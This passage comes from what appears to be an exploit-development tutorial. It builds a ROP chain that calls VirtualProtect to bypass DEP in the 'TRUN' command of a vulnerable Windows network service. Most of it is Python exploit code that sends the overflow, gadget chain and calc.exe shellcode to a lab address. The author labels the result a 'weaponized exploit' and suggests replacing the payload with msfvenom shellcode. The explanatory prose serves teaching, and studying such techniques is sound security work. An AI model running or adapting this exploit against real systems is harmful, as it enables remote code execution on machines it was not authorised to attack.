rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

A look at the disassembly window as we have approached the first mov gadget:

A look at the stack before the gadget execution:

Look at that! The memory address containing the return parameter (filled with 0x4c4c4c4c originally) placeholder was successfully manipulated to point to the shellcode area!:

The next ROP gadget of mov dword ptr ds:[edx], eax successfully updates the lpAddress parameter, also!:

Awesome. We are halfway there!

One thing you may have noticed from the mov dword ptr ds:[edx], eax ROP gadget is the ret instruction. Instead of a normal return, the gadget had a ret 0x000C instruction.

The number that comes after ret refers to the number of bytes that should be removed from the stack. C, in decimal, is 12. 12 bytes would refer to three 4-byte values in x86 (Each 32-bit DWORD memory address contains 4 bytes. 4 bytes * 3 values = 12 total). These types of returns are used to “clean up” items on the stack, by removing items. Essentially, this just removes the next 3 memory addresses after the ret is executed.

In any case- just as pop, we will have to add some padding to compensate. As mentioned above, a ret 0x000C will remove three memory addresses off of the stack. First, the return instruction takes the current stack pointer at the time of the ret 0x000C instruction (which would be the next ROP gadget in the chain) and loads it into EIP. EIP then executes that address as normally. That is why no padding is needed at that point. The 0x000C portion of the return from the now previous ROP gadget kicks in and takes the next three memory addresses removed off the stack. This is the reason why padding for ret NUM instructions are implemented in the NEXT ROP gadget instead of directly below, like pop padding.

This will be reflected and explained a bit better in the comments of the code for the updated POC that will include the size and flNewProtect parameters. In the meantime, let’s figure out what to do about the last two parameters we have not calculated.

Almost Home

Now all we have left to do is get the size parameter onto the stack (while compensating for the ret 0x000C instruction in the last ROP gadget).

Let’s make the size parameter about 300 hex bytes. This will easily be enough room for a useful piece of shellcode. Here, all we are going to do is spawn calc.exe, so for now 300 will do. The flNewProtect parameter should contain a value of 0x40, which gives the memory page read, write, and execute permissions.

At a high level, we will do exactly what we did last time with the return and lpAddress parameters:

  • Zero out a register for calculations
  • Insert 0x300 into that register
  • Make the current size parameter placeholder point to this newly calculated value

Repeat.

  • Zero out a register for calculations
  • Insert 0x40 into that register
  • Make the current flNewProtect parameter placeholder point to this newly calculated value.

The first step is to find a gadget that will “zero out” a register. EAX is always a great place to do calculations, so here is a useful ROP gadget:

0x41ad61cc: xor eax, eax ; ret ; WS2_32.dll

Remember, we now have to add padding for the last gadget’s ret 0x000C instruction. This will take out the next three lines of addresses- so we insert three lines of padding:

0x41414141
0x41414141
0x41414141

Then, we need to find a gadget to get 300 into EAX. We have already found a gadget from one of the previous gadgets! We will reuse this:

0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  msvcrt.dll

We need to repeat that three times (100 * 3 = 300). Remember, under each add eax, 0x00000100 gadget, to add a line of padding to compensate for the pop ebp instruction.

The last step is the pointer.

Right now, EDX (the register itself) still holds a value that is equal to the lpAddress parameter placeholder. We will increase EDX by four bytes- so it reaches the size parameter placeholder. We will also reuse an existing ROP gadget:

0x77f226d5: inc edx ; ret  ;  ntdll.dll

Now, we repeat what we did earlier and create a pointer from the DWORD within EDX (the size parameter placeholder) to the value in EAX (the correct size parameter value), reusing a previous ROP gadget:

0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

Again, that pesky ret 0x000C is present again. Make sure to keep a note of that. Also note the two pop instructions. Add padding to compensate there as well.

Since the process is the exact same, we will go ahead and knock out the flNewProtect parameter. Start by “zeroing out” EAX with an already found ROP gadget:

0x41ad61cc: xor eax, eax ; ret ; WS2_32.dll

Again- we have to add padding for the last gadget’s ret 0x000C instruction. Three addresses will be removed, so three lines of padding are needed:

0x41414141
0x41414141
0x41414141

Next we need the value of 0x40 in EAX. I could not find any viable pointers through any of the ROP gadgets I enumerated to add 0x40 directly. So instead, in typical ROP fashion, I had to make-do with what I had.

I added A LOT of add eax, 0x02 instructions. Here is the ROP gadget used:

0x77bd6b18: add eax, 0x02 ; ret  ;  RPCRT4.dll

Again, EDX is now pointed to the size parameter placeholder. Using EDX again, increment by four- to place the location of the flNewProtect placeholder parameter in EDX:

0x77f226d5: inc edx ; ret  ;  ntdll.dll

Last but not least, create a pointer from the DWORD referenced by EDX (the flNewProtect parameter) to EAX (where the value of flNewPRotect resides:

0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

Updated POC:

import struct
import sys
import os


import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Preparing the VirtualProtect size parameter (third parameter)
# Changing EAX to equal the third parameter, size (0x300).
# Increase EDX 4 bytes (to reach the VirtualProtect size parameter placeholder.)
# Remember, EDX currently is located at the VirtualProtect lpAddress placeholder.
# The size parameter is located 4 bytes after the lpAddress parameter
# Lastly, point EAX to new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)   # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Preparing the VirtualProtect flNewProtect parameter (fourth parameter)
# Changing EAX to equal the fourth parameter, flNewProtect (0x40)
# Increase EDX 4 bytes (to reach the VirtualProtect flNewProtect placeholder.)
# Remember, EDX currently is located at the VirtualProtect size placeholder.
# The flNewProtect parameter is located 4 bytes after the size parameter.
# Lastly, point EAX to the new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)  # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x77bd6b18)	# 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)  # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop ebp instruction in the above ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

EAX get “zeroed out”:

EAX now contains the value of what we would like the size parameter to be:

The memory address of the size parameter now points to the value of EAX, which is 0x300!:

It is time now to calculate the flNewProtect parameter.

0x40 is the intended value here. It is placed into EAX:

Then, EDX is increased by four and the DWORD within EDX (the flNewProtect placeholder) it manipulated to point to the value of EAX- which is 0x40! All of our parameters have successfully been added to the stack!:

All that is left now, is we need to jump back to the VirtualProtect call! but how will we do this?!

Remember very early in this tutorial, when we saved the old stack pointer into ECX? Then, we performed some calculations on ECX to increase it to equal the first “parameter”, the return address? Recall that the return address is four bytes greater than the place where VirtualProtect() is called. This means if we can decrement ECX by four bytes, it would contain the address of the call to VirtualProtect().

However, in assembly, one of the best registers to make calculations to is EAX. Since we are done with the parameters, we will move the value of ECX into EAX. We will then decrement EAX by four bytes. Then, we will exchange the EAX register (which contains the call to VirtualProtect() with ESP). At this point, the VirtualProtect() address will be in ESP. Since the exchange instruction will be apart of a ROP gadget, the ret at the end of the gadget will load new ESP (the VirtualProtect() address) into EIP- and thus executing the call to VirtualProtect() with all of the correct parameters on the stack!

There is one problem though. In the very beginning, we gave the arguments for return and lpAddress. These should contain the address of the shellcode, or the NOPS right before the shellcode. We only gave a 100-byte buffer between those parameters and our shellcode. We have added a lot of ROP chains since then, thus our shellcode is no longer located 100 bytes from the VirtualProtect() parameters.

There is a simple solution to this: we will make the address of return and lpAddress 100 bytes greater.

This will be changed at this part of the POC:

---
# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget
---

We will update it to the following, to make it 100 bytes greater, and land around our shellcode:

---
# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget---
---

ROP gadgets for decrementing ECX, moving ECX into EAX, and exchanging EAX with ESP:

0x77e4a5e6: mov eax, ecx ; ret  ; kernel32.dll
0x41ac863b: dec eax ; dec eax ; ret  ;  WS2_32.dll
0x77d6fa6a: xchg eax, esp ; ret  ;  ntdll.dll

After all of the changes have been made, this is the final weaponized exploit has been created:

import struct
import sys
import os


import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Preparing the VirtualProtect size parameter (third parameter)
# Changing EAX to equal the third parameter, size (0x300).
# Increase EDX 4 bytes (to reach the VirtualProtect size parameter placeholder.)
# Remember, EDX currently is located at the VirtualProtect lpAddress placeholder.
# The size parameter is located 4 bytes after the lpAddress parameter
# Lastly, point EAX to new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)   # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Preparing the VirtualProtect flNewProtect parameter (fourth parameter)
# Changing EAX to equal the fourth parameter, flNewProtect (0x40)
# Increase EDX 4 bytes (to reach the VirtualProtect flNewProtect placeholder.)
# Remember, EDX currently is located at the VirtualProtect size placeholder.
# The flNewProtect parameter is located 4 bytes after the size parameter.
# Lastly, point EAX to the new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)  # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x77bd6b18)	# 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
